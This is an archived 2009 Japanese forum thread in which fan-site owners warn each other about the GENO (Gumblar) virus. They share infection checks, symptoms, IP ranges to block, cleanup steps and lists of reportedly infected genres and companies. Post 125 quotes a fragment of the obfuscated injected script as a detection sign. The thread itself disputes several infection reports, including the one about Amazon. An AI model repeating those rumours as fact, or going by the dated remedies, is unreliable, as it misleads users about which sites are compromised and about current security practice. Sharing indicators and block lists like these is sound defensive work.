5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【管理も】同人サイト・GENOウィルス注意2【閲覧も】

1 :GENO:2009/05/16(土) 12:18:52 ID:5lkXxW8S0
新種のコンピュータウィルスが流行っています。
感染サイトを踏んだだけで発症し、大半のアンチウィルスソフトで検知されません。
変化が早く、一部の検知可能なソフトも最新型には対応できていない状況です。

感染の場合ワクチンはなく、クリーンインスコ必須、パス変必須(FTPパス抜きされる)です。

現時点で大半のセキュリティソフトをくぐり抜けてしまうため、
とりあえずジャンル関係なく、全ジャンルでサイト管理人・閲覧者に感染チェックを推奨します。
特にサイト管理人は二次被害を起こしてしまいますので、早急な確認が望ましいと思われます。

・確認点

【sqlsodbc.chmが改ざんされていないかを確認】
 Windows XP: 改ざんされていなければ
 C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 Windows 2000: そもそも存在しないはずなので、
 C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
【cmd.exe、regedit.exeが立ち上がるかどうか】
 このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。

前スレ
【管理も】同人サイト・GENOウィルス注意【閲覧も】
http://changi.2ch.net/test/read.cgi/doujin/1242391122/

関連スレ
GENOウイルススレ ★5
http://pc11.2ch.net/test/read.cgi/sec/1242415022/

2 :GENO:2009/05/16(土) 12:28:19 ID:V9V0BvaO0
次からは>>1の上のほうに入れてください

同人サイト向け・通称「GENOウイルス」対策まとめ
ttp://www31.atwiki.jp/doujin_vinfo/

3 :geno:2009/05/16(土) 12:29:36 ID:DB2jANJ60
当スレでは感染報告については、注意喚起の観点から

・感染が認められたジャンル名

のみ報告OKです。
感染報告をする際は、ジャンル名・ジャンル内シリーズ名など
伏字・略称にせず、わかりやすく書いてくだささい。

晒しやウォチ、風評被害を防ぐため、個人サイトを特定できる形で話題に出すのはNGです。
また、アドレス晒しは、踏むとマジで危ないので絶対厳禁。

4 :geno:2009/05/16(土) 12:37:14 ID:jxRVr/+e0
[現状での対策方法]

WindowsUpdate
PDFリーダーを最新にする (AdobeReader や Foxit Reader)
AdobeFlashを最新にする
FW(ファイアウォール)を有効にし、以下のIPを遮断→94.247.0.0/16、94.229.65.160/27(最新)
Javascriptを切る
貼られている怪しいリンクをむやみに開かない
ウイルス定義ファイルを更新する

[確認される症状]
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染するとFTPのパス抜かれて、自サイトにウイルスのjavaスクリプト貼られるらしい。
結果、サイトがゾンビ化し来た閲覧者に二次感染する

5 :geno:2009/05/16(土) 12:43:44 ID:GkrMDzLV0

02.テニス(ミュ・同人・ファンサイト)

全カテゴリにわたって感染してるサイトがあったので
こちらにしたほうがいいと思います

6 :geno:2009/05/16(土) 12:45:35 ID:JMVvzCMa0
■■■感染していたら(HP管理人向け)■■■
・とりあえずFTP上のファイルを全て削除し、閲覧できない状態にしましょう。
 感染ファイルを残しておくと閲覧者が感染しさらに拡大することになります。

・PCはクリーンインストールするしか手がありません。早急に。
 完了するまでネットに接続しないよう、LANケーブルやルータを引っこ抜いて完全に遮断してしまいましょう。

・可能であれば携帯や感染していないサブマシンなどから相互リンクサイトなどの管理人に報告。
 サーチに登録している人はサーチ管理人にも必ず連絡し、注意喚起をお願いして下さい。

・クリーンインストールが完了したら、すぐにFTPのパスワードを変更してください。
 感染時に使っていたIDとパスは既に悪意あるユーザーに漏れています。
 以後、しばらくは短期・不定期にパスワードを変えた方が安全でしょう。

7 :GENO:2009/05/16(土) 12:46:19 ID:yagAmRb40
>>1
wiki編集できなかったのでこちらに。どなたか追加してくださると有難いです

★Vistaの場合 sqlsodbc.chm は
 C:\Windows\Help\mui\0409
 C:\Windows\Help\mui\0411
このどちらか、あるいは両方のディレクトリの中に sqlsodbc.chm があります。
sqlsodbc.chm を右クリック→プロパティでボリュームが確認できますので、
そこが 50,727 bytes なら正常です。

8 :geno:2009/05/16(土) 12:46:21 ID:JMVvzCMa0
■■■初心者向けまとめ ■■■

【sqlsodbc.chmが改ざんされていないかを確認】
 Windows XP: 改ざんされていなければ
 C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 Windows 2000: そもそも存在しないはずなので、
 C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
確認方法
1)マイコンピュータ→Cドライブ→WINDOWSフォルダ→system32フォルダを開く
2)Ctrl+Fか目視で sqlsodbc.chm を探す
3)ファイル右クリック→プロパティでサイズを確認
4)サイズ:49.5 KB (50,727 バイト)と表示されればとりあえず一つクリア
 →それ以外なら感染してる可能性高

9 :GENO:2009/05/16(土) 12:46:24 ID:QEvo2/9u0
Firefoxはデフォルトのままだとgoogleの検索結果を先読みする。
先読みしたページがウィルス感染してるとアウト。

[対策]
FirefoxのURLバーに「about:config」と入力する。※警告が出てきても大丈夫
上のフィルタという所に「network.prefetch-next」と入力して、
出てきた値がtrueだったらダブルクリック→falseにする。

以上 GENOウイルススレ ★5より

10 :geno:2009/05/16(土) 12:47:03 ID:JMVvzCMa0
※sqlsodbc.chmが見つからない人
マイコンピュータを開く→Ctrl+F→ファイルやフォルダを検索
ファイル名に「sqlsodbc」
検索先を「マイコンピュータ」で探せ
時間かかるけど確実だから

【cmd.exe、regedit.exeが立ち上がるかどうか】
 このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
確認方法
1)スタート→ファイル名を指定して実行→regeditもしくはcmdと入力→OK押す
2)コマンドプロンプト(cmd.exe・黒い背景のウィンドウ)
  レジストリエディタ(regedit.exe・起動しても何も触らずすぐ閉じるが吉。初心者がいじると危険)
  が立ち上がれば一つクリア
 →実行できない場合は感染してる可能性高


11 :GENO:2009/05/16(土) 12:51:28 ID:NddsKjpSO
>>1以外のテンプレ貼りは荒らしということでおK?

12 :GENO:2009/05/16(土) 12:52:33 ID:5lkXxW8S0
>>1だけどテンプレお願いしたのは自分の方です
まとめが多すぎて追い切れなくてどれ貼れば良かったのかわからなくて
とりあえず難民出ないようにスレ立てだけやりました。申し訳ない

13 ::2009/05/16(土) 12:52:58 ID:mw4bEjk60
>>1
そろそろニュー速でスレが立ちそうだから
同人関係なく普通のサイトがやばいという主旨に変えたほうが良いと思うよ

14 :geno:2009/05/16(土) 12:53:21 ID:CsA6F3kM0
>>11
ちゃんとした対策だ安心しろ

15 :.:2009/05/16(土) 12:54:21 ID:RB3rnXLV0
オンラインウィルススキャン
ttp://www.kaspersky.com/virusscanner

ソースチェッカーオンライン
ttp://so.7walker.net/guide.php

16 :GENO:2009/05/16(土) 12:54:42 ID:NmGX8V+i0
Amazonやらスクエニやらは確認出来る人いる?
マジならシャレにならん…

17 :GENO:2009/05/16(土) 12:54:59 ID:tRYHiqa3O
スレ立て&テンプレ貼り乙です
このウイルス作った奴がきちんと裁かれますように

18 :geno:2009/05/16(土) 12:55:01 ID:KBaZxwMuO
まとめWikiに載ってる感染確認方法全部やった
全部クリアしたよ

でもwindows updateに繋がんね('A`)
何でだよ

19 :geno:2009/05/16(土) 12:55:02 ID:fsWEj42p0
>>847 をJavaScript

現在ウィルス検出出来てるソフトも新種・亜種にはなかなか対応出来ないため、JavaScript切るのがとりあえず確実
ネサフしないのが一番安全。

※単にJavaとだけ言うと、JavaScriptではなくJavaアプレットを指すことがあります。名前は似てるけど別物
ここで確実に切ってほしいのはJavaScript。
ちなみにJavaアプレットを使っているページではタスクトレイにマークが表示される。念のためこちらも最新のものに更新して、使ってる覚えがなければ切っておくとベター。


(前スレのテンプレ案からちょっと直しました。(Java/Javascriptの件)指摘あればお願いします。)

20 :GENO:2009/05/16(土) 12:55:13 ID:b/+eltGS0
>>1
ageて行こう

21 :19:2009/05/16(土) 12:56:43 ID:fsWEj42p0
1行目は編集してたときの残骸なのでなかったことにしてくだしあ_| ̄|○

22 :GENO:2009/05/16(土) 12:56:57 ID:X5JJpuvB0
>>18
大丈夫、私も繋がらない。
感染はして無い。


23 :GENO:2009/05/16(土) 12:56:57 ID:NmGX8V+i0
今Windowsのアップデートにだけつながらないのはアクセス集中してる可能性高くないかな

24 ::2009/05/16(土) 12:57:14 ID:mw4bEjk60
やべー
状況報告見てると大手の法人サイトショッピングサイトも次々と感染してるような?

25 :GENO:2009/05/16(土) 12:57:39 ID:l/Im8ln/0
いちおつ
公式サイトだったら伏せたりせず詳しく書いてもいいんでないかね

26 :geno:2009/05/16(土) 12:59:02 ID:JMWvRLu6P
感染チェックはクリアしたけど
明日どころか今日今この瞬間もウィルスは進化してるわけだし
日記代わりのブログに更新停止宣言してきた
ftpソフトいったん破棄して、騒ぎが収まってから
ftpソフト再インストールした方が安全かな

間違ってクリックしないように
とりあえずデスクトップにあるftpへのショートカットはお前らも捨てとけ

27 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 12:59:32 ID:lmTZNShi0
>>18
繋がるけど重くなってる

28 :げの:2009/05/16(土) 13:00:09 ID:0gY22C790
自分は感染しているサイトを見た覚えは何だけど
SQLSODBC.CHMというファイルが2つあって
そのどちらもファイルサイズは49.5k
しかし>>1で確認される症状は無く、自分のサイトのファイルも特に問題ないみたい
このウイルスは潜伏期間とかあったりするのか?
サイトをアップデートしたのは一月前くらいなんだけど・・・

29 :げの:2009/05/16(土) 13:00:37 ID:KBaZxwMuO
>>22-23
そうか、アクセス集中してんのか

とりあえず家のPCは大丈夫そうだが、問題は家族なんだよなぁ
カーチャン、何も知らずに毎晩ヤフオク見てるからなー
いつどこで感染するか分からんから、家族にPC使う人いたら暫く使わせないようにしようぜ

30 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:00:41 ID:EKPYjVdC0
>>23
>>23
並大抵のアクセス集中じゃなきゃ繋がらないなんてことはないぞ。少なくともMSの鯖は。
現に俺は接続出来た。

31 :geno:2009/05/16(土) 13:01:49 ID:CsA6F3kM0
>>28
亜種が沸いてるからなんとも胃炎
気になるならテンプレ通りにやってみるしかない
それかクリーンインスコ

32 :げの:2009/05/16(土) 13:01:59 ID:KBaZxwMuO
>>28
つSQLSODBC.CHMを右クリック→プロパティ

33 :変態:2009/05/16(土) 13:02:06 ID:2czcVeGEO
vistaも感染するのか?

34 :GENO:2009/05/16(土) 13:02:18 ID:qVxtVMze0
Windows Xp SP3インストール時に発生する無限ループ
http://cgi.sainet.or.jp/~kouji/ugoke3/pcsub50.htm

AMD使用でSP3にするとメーカーがHP以外でも故障する恐れがあるから
必ずパッチを当ててからにするように(リブート繰り返します)

35 :GENO:2009/05/16(土) 13:03:12 ID:yagAmRb40
他のウィルスって可能性もあるんでは?
完全スキャンしても大丈夫だったならタイミング悪かっただけかもしれない

36 :GENO:2009/05/16(土) 13:04:32 ID:/o2o6iRN0
前スレでも言ってる人いたけど
wikiの週間飛翔はジャンプに変えた方がいいんじゃない?
あまり2ch発祥の伏字や略語使わない方が普及しやすいと思う

37 :geno:2009/05/16(土) 13:05:30 ID:1Jd1LSOl0
>>33
油断は禁物

亜種がばんばん出て来てるのが怖い、後手に回るしかないからな…

38 :GENO:2009/05/16(土) 13:05:58 ID:l54XS8Jy0
戦国BASARAだがアンソロサイトが感染してる
一応報告

39 :GENO:2009/05/16(土) 13:06:31 ID:xaFopEY20
>>15のソースチェッカーオンラインで
感染サイトみるとどういう表示になる?

40 :GENO:2009/05/16(土) 13:06:40 ID:SI4sOMsg0
>>33
前スレをVistaで検索

41 :GENO報告:2009/05/16(土) 13:08:14 ID:favl3anr0
感染サイトをいくつか見つけたので

・東方 音楽サークルの告知サイト
・ひぐらし 男性向けイラストサイト
・コナン ノマカプサイト
・オリJUNEサークルの告知サイト
・ヘタリアの携帯向け同盟サイト(PCレン鯖)

42 :げの:2009/05/16(土) 13:08:16 ID:0gY22C790
>>32
両方プロパティで確認した
というかスマン、>>8見たら49.5kで問題ないみたいだな
お騒がせした
感染して無いみたいでほっとしたw

43 :GENO:2009/05/16(土) 13:08:33 ID:bQAw9ln80
>>36
同意
ふざけてるように思われるしね。

44 :GENO:2009/05/16(土) 13:09:19 ID:j1pb6S310
有名感染サイト

GENO
2ちゃんねる
小林製薬
集英社 new!
スクエニ new!
Amazon new!(未確認)

45 :geno:2009/05/16(土) 13:09:57 ID:5JaCMj260
>>44
集英社も?

46 :GENO:2009/05/16(土) 13:10:04 ID:b/+eltGS0
>>44
集英社もスクエニも確認されたのか・・・

47 :GENO:2009/05/16(土) 13:10:19 ID:1IKNFq2y0
wikiの編集方法が分からない…誰か感染ジャンルの青年漫画の項に
前スレにでてた福本伸行作品(逆境、銀と金)も追加してほしい

48 :geno:2009/05/16(土) 13:10:56 ID:Y7tqE6rM0
その二つはちゃんと確認されてないんじゃないの

49 :GENO:2009/05/16(土) 13:10:57 ID:APiqzc70O
アマゾンからクレジット情報消しときたいんだが今アクセスするのは危険だよな…
ほんともうやだ

50 :GENO:2009/05/16(土) 13:11:09 ID:fK6yapaL0
風評だすとマズイんじゃないの

51 :GENO:2009/05/16(土) 13:11:20 ID:DAWCjk8m0
アマゾンとりあえずログアウトしてくるか・・・

52 :GENO:2009/05/16(土) 13:11:34 ID:vdqvVnja0
セキュ板の方でもいわれてるけど、
アマゾン、スクエニは釣りじゃなくガチなの?
あと集英社じゃなく小学館って書かれてなかったか。

こんな状況だ、釣りは本当にやめようよ。
釣りじゃないなら「そのサイトのどこで確認したのか」まで書いてほしい。

53 :geno:2009/05/16(土) 13:11:35 ID:5qGyw+II0
>>44
風雪のルルで逮捕

54 :GENO:2009/05/16(土) 13:12:08 ID:tRYHiqa3O
2ちゃんはどの板とかある?

55 :GENO:2009/05/16(土) 13:12:34 ID:8tTTUnH70
>>52
ほんと同意
面白がって書いてる奴も信じられないわ…

56 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:13:20 ID:ZCGD5Sgx0
誰か感染ジャンル一覧頼む

57 :GENO:2009/05/16(土) 13:13:35 ID:GOBtsDJB0
Amazonは感染してないみたい
その他は未確認

805 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/16(土) 12:56:45
view-source:http://www.amazon.co.jp/

いまんところmartuないぞ

58 :geno:2009/05/16(土) 13:13:36 ID:DrpTT5Nn0
伝説の呂布登場か

59 :GENO:2009/05/16(土) 13:13:36 ID:86dGyboo0
>>52
禿同
2chは結局専ブラで見ればおkってことだよね
ブラウザで見てる人は専ブラ入れればいいんじゃないかな


60 :GENO:2009/05/16(土) 13:13:46 ID:j1pb6S310
>>49
>>51
このウイルスは自分自身が感染しないかぎり情報を盗まれない
今Amazonにアクセスするのは逆に危険

61 :GENO:2009/05/16(土) 13:13:50 ID:fUKChIx00
スクエニとか集英社は本当に確認したの?
Amazonも未確認になってるけど…
具体的にどこが感染してるんだろ
企業サイトは具体的にいっちゃってOKだろう

62 :GENO:2009/05/16(土) 13:14:01 ID:m5Y6sdCH0
amazonは釣りでしょ
さっき行ってみたけど何も問題が無かった。

63 :GENO:2009/05/16(土) 13:14:01 ID:NoC9xktr0
小学館とスクエニは公式サイトが感染していると書かれたが未確認(前スレ992)
Amazonは本スレで「ショッピングサイトが感染してた」という話の流れから名前が出ただけ
集栄は>44まで名前すら出てきてない

まあなんだ、もちつけ

64 :GENO:2009/05/16(土) 13:14:12 ID:KKxMPSTPO
アマゾンって今行くの危険か?ログアウトしておくべき?
もし購入履歴流出したりしたら死にそう…

65 :geno:2009/05/16(土) 13:14:14 ID:jxRVr/+e0
アニメ系
01.エヴァ(小説サーチ)
02.忍たま乱太郎(同人サイト)
03.ガンダム00(同人サイト)
04,プリキュア
05,天体戦士サンレッド(同人サイト)
06,コードギアス(同人サイト)
07,ガンダム00(同人サイト)
08,レッツ&ゴー
09,イナズマイレブン

少年漫画(週刊ジャンプ系) ※集英社公式
01.リボーン(プチオンリー告知サイト・ファンサイト)
02.テニミュ(同人サイト・ファンサイト)
03.ジョジョの奇妙な冒険(同人サイト)
04,ワンピース(同人サイト)
05,デスノート(同人サイト)
06,D.Gray-man(同人サイト)

少年漫画(その他)
01.鋼の錬金術師(オンリー告知サイト・同人サイト)

青年漫画
01.ヘタリア(同人サイト)
02.おお振り(アンソロ告知サイト・同人サイト)
03.福本伸行作品(逆境、銀と金)

66 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:14:16 ID:EKPYjVdC0
同人板での対応がわからないのだが、具体的なURLを晒す気は全くないのか?
ジャンル名のみという対応が無用な混乱をさせている気がする

67 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:14:27 ID:Paj3WElY0
あぶねぇ・・・ネトゲで顔文字とか出すためにUACを無効にしてたよ
色々チェックして感染してないことはわかったからよかった

68 :GENO:2009/05/16(土) 13:14:59 ID:46CRPLWL0
ガンSEEDノマカプサイトでavast!が反応(トロイの木馬)した
先月末の話なんだけど、このウイルスだった可能性ってあるのかな


69 :geno:2009/05/16(土) 13:15:06 ID:jxRVr/+e0
ゲーム(RPG・ACT)
01.幻想水滸伝(同人サイト)
02.戦国BASARA(同人サイト) /03.戦国無双(同人サイト)
04.バイオハザード(同人サイト)
05.メガテン(真、サマナー、ライドウ、ペルソナ4 )(同人サイト)
06,テイルズオブジアビス(主人公受け)(同人サイト)
07,セブンスドラゴン
08.ブレイブルー

ゲーム(恋愛)
01.乙女ゲームのVitamin(同人サイト)
02.遙かなる時空の中で(同人サイト)
03.Fate(同人サイト)
04,ニトロプラスキラル咎狗(同人サイト・アンソロ告知サイト)
05,乙女ゲームのStarry☆Sky(同人サイト)
06,乙女ゲームのクインロゼ(同人サイト)
07乙女ゲームの薄桜鬼同人サイト

ゲーム(その他とか仕分け不明とか)
01,ポップンミュージック(同人サイト)
02,東方(大手同人サイト)

小説・ライトノベル
01,小野不由美系サーチ(サーチ)

創作
01,創作小説/02創作同人ゲーム

その他の接触確率の高そうな報告例
01,非同人系ゲーム同盟サイト/02,模型イベントホビーコンプレックス告知サイト

70 :geno:2009/05/16(土) 13:15:19 ID:wQTybYbw0
情報が混乱してるね、小林製薬みたい確定できてるとこ以外は
釣りの可能性も高いからうのみにすんな

71 :geno:2009/05/16(土) 13:15:32 ID:rHuvw5CU0
>>64
だからえっちなものは買うなと…

72 :げの:2009/05/16(土) 13:15:54 ID:SZhmkwod0
ここのテンプレとwikiに、同人以外の感染公式サイトも載せて欲しい。
うかつに見て回れないので、知ってる人はぜひ。
俺、いまんとこ、小林製薬しかしらん。

73 :GENO:2009/05/16(土) 13:17:22 ID:APiqzc70O
>>60
そうか…
母親にウイルスのこと言ったらクレジット情報消しといてくれとぎゃいぎゃいやかましくてな。ありがとう。
自分のPCは感染してないからしばらくネット絶つわ

74 :GENO:2009/05/16(土) 13:17:22 ID:ZCGD5Sgx0
>>65
>>69
ありがとう

75 :GENO:2009/05/16(土) 13:18:46 ID:tRYHiqa3O
>>15の下の方のチェッカーでアマゾン試したらなんともなかったよ
携帯から書き込んでますがマカです

76 :GENO:2009/05/16(土) 13:18:47 ID:QEvo2/9u0
>>59
専ブラ入れたいんだが怖くて検索結果踏めないww

77 :GENO:2009/05/16(土) 13:18:49 ID:dUhoo+Zw0
>>66
個人サイト出しOKにしちゃうと、晒しとか乱入してきて、よけい混乱しそうな気がする。
ジャンル特定されれば、大体は関連ジャンルスレがあると思うから
あとはそっちで個々に対応決めてもらうのはどうだろう。

ただ、アンソロ系・イベント系はもう少し特定できる形で書いてもいいように
個人的には思っている

78 :GENO:2009/05/16(土) 13:18:51 ID:5dy38PGO0
>>72
照英のブログ見に行っちゃだめだぞ
あとsageない方がよくね?この状況だし注意喚起しときたい

79 :げの:2009/05/16(土) 13:19:00 ID:SNy4nyVD0
ノートン使いの自分涙目な状況なんだけど、落ち着くまで
ノートンと一緒にavast入れておいた方がいいのかな
セキュリティソフト2つ入れるのってよくないと言うけど、
背に腹は代えられないってことで同じことしてる人いる?

80 :GENO:2009/05/16(土) 13:19:41 ID:/m6gQ1ZiP
アマとかは来てないだろう
流石に不確定でこれらは洒落になんないから確証得手からにしてほしい

81 :GENO:2009/05/16(土) 13:20:10 ID:Tn2MNOak0
検索したら二つでてきたんだけど
sysytem32内のSQLSODBC.CHMサイズは50,727 バイト
I386のなかにSQLSODBC.CHMが50,727 バイトと38.718バイトってあるけどこれは問題なし?
コマンドプロンプトもレジストリも開きます。

82 :geno:2009/05/16(土) 13:20:14 ID:wh+11tX1O
>>66
貼ると必ず踏む奴が出るし、勘違いした正義漢が騒ぎを大きくしかねないから
あとここの住人はurlが無くてもあんま混乱してないかと

83 :GENO:2009/05/16(土) 13:20:26 ID:SI4sOMsg0
>>66
個人サイトの晒しは絶対ありえない文化だと思っていてくれればおk

84 :GENO:2009/05/16(土) 13:21:15 ID:5lkXxW8S0
>>66
2ちゃんで個人サイト晒すのだけはNG
ただアンソロとかは何アンソロかぐらいは書いてもいいんじゃないかと

85 :GENO:2009/05/16(土) 13:21:30 ID:3WfRqqkb0
>>79
ノートン切ってからavast入れなよ

86 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:21:35 ID:EKPYjVdC0
>>77
すごく微妙なのはわかっている。ただ、今回の騒動は1ヶ月以上前から発生しているんだよ。
それが全然沈静化していない。そこら辺も考えてみると、結構恐い話だってことがわかると思う。
それに基本的には表立って報道もされていないしな。

87 :GENO:2009/05/16(土) 13:21:40 ID:A9qSW+uH0
URL出したら被害拡大するじゃねーか何言ってんだ

88 :げの:2009/05/16(土) 13:21:59 ID:0gY22C790
>>79
なぜセキュリティソフト一緒にsたら駄目なのか根本的に知っておいた方がいい
アンチウイルスソフトを同居させると、機能合致してどちも起動しない
最悪PCアボンだから駄目だってことなんだよ
そもそもアンチウイルス入れるとき、他にアンチウイルスが入ってたら
インストールさえも出来ないと思う

89 :.:2009/05/16(土) 13:24:03 ID:RB3rnXLV0
鯖缶に警告メール出すからドメイン晒せって言ってるんだけど
ttp://www.2ch.net/←ここまで
個人サイト云々とかアホは黙ってろ

90 :geno:2009/05/16(土) 13:24:10 ID:wQTybYbw0
>>86
騒ぎ自体は1ヶ月以上前からだし同人サイトでの感染疑惑は4月中から
あったが何故ここにきて一気に出てきたんだろうね?

91 :GENO:2009/05/16(土) 13:24:11 ID:0/l5l5Bd0
豚インフル国内感染者10名突破!3ヶ月の大型イベント禁止でコミケ終了のお知らせ
http://tsushima.2ch.net/test/read.cgi/news/1242447512/

92 :geno:2009/05/16(土) 13:24:14 ID:wh+11tX1O
>>86
気持ちはわかるが、過剰反応で派生する事態も恐い

取りあえず同人板はこうだ、と今は理解してくれれば有難い

93 :GENO:2009/05/16(土) 13:24:59 ID:rSTY5Iaw0
ジャンル指定だけでいいんじゃないか?
下手に特定するとそこ行ってないから大丈夫って思いそう

94 :GENO:2009/05/16(土) 13:26:00 ID:LZxxGYzu0
>>90
海外発で今月になって日本上陸したから
http://internet.watch.impress.co.jp/cda/news/2009/05/14/23435.html

95 :GENO:2009/05/16(土) 13:27:58 ID:yagAmRb40
>>81
感染してたら1000とか2000バイトになるらしい
万いっててcmd.exe、regedit.exeが起動するなら大丈夫じゃない?

96 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:28:23 ID:eQafMeB50
>>93
でもあまりにも抽象的なのもネット徘徊するな専ブラで2chだけ見ろって事に
まぁソレが一番だろうけど

97 :GENO:2009/05/16(土) 13:28:49 ID:JEMtfEwSO
挙動おかしいなと思ってたんだよ
感染確認した orz

参考にsqlsodbc.chmのファイル情報調べたらリカバるわ


ftpに繋がらなくなってた(ウィルス関係あるのかな?)から人様に迷惑をかけてはいないのが救いだ

98 :GENO:2009/05/16(土) 13:28:55 ID:SeXkxkaS0
コマンドは立ち上がるし正常だった
自サイトのコードも正常だった

sqlsodbc.chmファイルサイズが異常に小さい
最終更新日がなぜか2008年3月なんだけど

ニフティでスキャンしたら
WINDOWSファイルの中のファイルに
Trojan-PSW.Win32.Kates.c
感染発見

これは真っ黒ですね・・・?

99 :げの:2009/05/16(土) 13:30:02 ID:eBDfFPMrO
>>79
もう何年も前の古いPCの頃だけど、ノートンとavast入れてたら動作不安定になった
原因はもしかしたら別だったかもしれんが、その時はノートン捨てた

先月あたりからやたらavast反応すると思ったらこれだったのか
とりあえず感謝のお布施でもしてきたくなった


100 :GENO:2009/05/16(土) 13:30:19 ID:xMvEdJG1O
同人は横の繋がり強いから
該当ジャンルが出たらアウト
即チェックすべし

がいいと思うけど

101 :GENO:2009/05/16(土) 13:30:35 ID:3yPyQZeO0
>>90
つい最近どこかの動画サイトが感染したのが大きいんじゃないだろうか

102 :geno:2009/05/16(土) 13:30:44 ID:jxRVr/+e0
あのさ、はっきり黒だってわかってる人は未報告ジャンルでもない限り
いちいち書き込んでないで、とっとと回線切ってクリーンインスコしてくれないか

103 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:30:42 ID:SpwLg/1F0
>>98
真っ黒だな、ご愁傷様
クリーンインスコすべし

104 :GENO:2009/05/16(土) 13:30:51 ID:aC1VE58l0
誘導されて感染報告に来ました

・遊戯王(無印)同人サイト

該当サイトは対処済み

105 :GENO:2009/05/16(土) 13:31:03 ID:jEd8BWmF0
>>98
アウト

106 :geno:2009/05/16(土) 13:32:06 ID:JMVvzCMa0
コマンド立ち上がっても感染してるんだな

107 :GENO:2009/05/16(土) 13:32:15 ID:lapl18Rv0
尼行ってログアウトさせてきたけどavast特に反応しなかった
一応書いとくとjs全切にNoscript入れた狐

108 :.:2009/05/16(土) 13:32:35 ID:RB3rnXLV0
>>97 感染した(疑わしい)状態でFTPにアクセスは御法度
>>98 確定 OSの再インストール&全パスワード変更いってらっしゃい

109 :GENO:2009/05/16(土) 13:32:37 ID:jlVsAhlH0
感染するしないに関わらず
サイトのリンクページ切っといた方がいいんだろうか


110 :げの:2009/05/16(土) 13:32:37 ID:KBaZxwMuO
>>98
アウツ!!

111 :GENO:2009/05/16(土) 13:33:14 ID:Lxu26EqS0
>>97
繋げようとした時点でftpパス抜かれてるよ

112 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:34:59 ID:SJUFg51d0
感染報告

薄桜鬼の同人サイト

113 :geno:2009/05/16(土) 13:35:47 ID:xF88a00E0
>>112

>>69

114 :GENO:2009/05/16(土) 13:35:52 ID:Fp/E32vW0
avastは得に何の設定もしなくていいんだよね?

115 :GENO:2009/05/16(土) 13:35:58 ID:SJUFg51d0
名前欄orz

116 :GENO:2009/05/16(土) 13:36:54 ID:UdYRnt/i0
>>97
自パソからFTP繋がらなくても外部からサーバーにFTPでログインされて
ファイル改竄されるよ。
早くサーバーログイン(FTP接続)用のパスワード変えた方がいい。

117 :GENO:2009/05/16(土) 13:37:32 ID:46CRPLWL0
ちょっと聞きたいことがあるんだけど
>>15
のソースチェッカーオンラインで何が出たらGENOウイルス感染確定なんだろうか
「注意!ループタグを発見!」「隠しスプリクトを発見しました」
ソース部分には<BODY〜<FONT〜<script>以下によく分からない数字と英文字がズラズラとならんで
おまけにavastでトロイの木馬警告が出た…

118 :GENO:2009/05/16(土) 13:37:56 ID:GfLVqANbO
>>109
自分は他サイトへのリンクは調整中と称して外したよ
自ジャンルで感染した人と相互していたのもあるけど(すでにその人は対処済)

119 :GENO:2009/05/16(土) 13:38:07 ID:7At3zIvVO
コマンドプロンプトとレジストリエディタの起動を確認
サイトのソース、更新日時も問題なし
とりあえず大丈夫みたいだ…よかった

120 :GENO:2009/05/16(土) 13:38:39 ID:qVxtVMze0
>>117
完全にアウト

121 :.:2009/05/16(土) 13:39:11 ID:RB3rnXLV0
Trojan-PSW.Win32.Kates.c
Trojan.Win32.Agent.cglu

亜種があるからこれだけじゃないはず

122 :GENO:2009/05/16(土) 13:39:50 ID:V9V0BvaO0
感染したサイトを見つけようにも怖くて巡回できないわけで

123 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:40:02 ID:SJUFg51d0
>>113
スマソ

124 :GENO:2009/05/16(土) 13:40:27 ID:Q03uMX6X0
>>122
そのレベルで見つけようとする必要全くないから

125 :GENO:2009/05/16(土) 13:41:51 ID:jTfkUc7xP
>>117
bodyの前に
<script language=javascript><!--
(function(TitRT){var H5h='%';var B4mN=(

こんな感じの入ってたらやばい

126 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:42:14 ID:EKPYjVdC0
とりあえず感染者は訪問者に告知だけでもしといてあげてくだせえ
薬事日報や小林製薬のプレスリリースへのリンク貼るのも有効かもしれない
無論ここの人が立ち上げてwikiへのリンクも

127 :GENO:2009/05/16(土) 13:42:23 ID:T9YpF4NP0
>>121
こりゃ煩悩を断って修行僧のように清く正しく2ch閲覧しながら原稿に勤しむしかないな…
山田みたいに変なもの落とさなきゃいいってもんじゃないし…

128 :名前欄にスレ名入力推奨@自治スレ:2009/05/16(土) 13:42:53 ID:we2SERvA0
未感染のうちにFTPソフトからパスその他全部抹消し、
サイトデータを外部保存してきた。
自分が感染拡大の経路にはなりたくない。

いつ食らってもおかしくない以上、
サイト餅は最悪の事態を念頭に置いといた方がいいな。
もちろんアップデートその他の対策は全部やった上でね。

129 :GENO:2009/05/16(土) 13:44:02 ID:T9YpF4NP0
30 :名無しさん@お腹いっぱい。 :2009/05/16(土) 13:41:46
現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
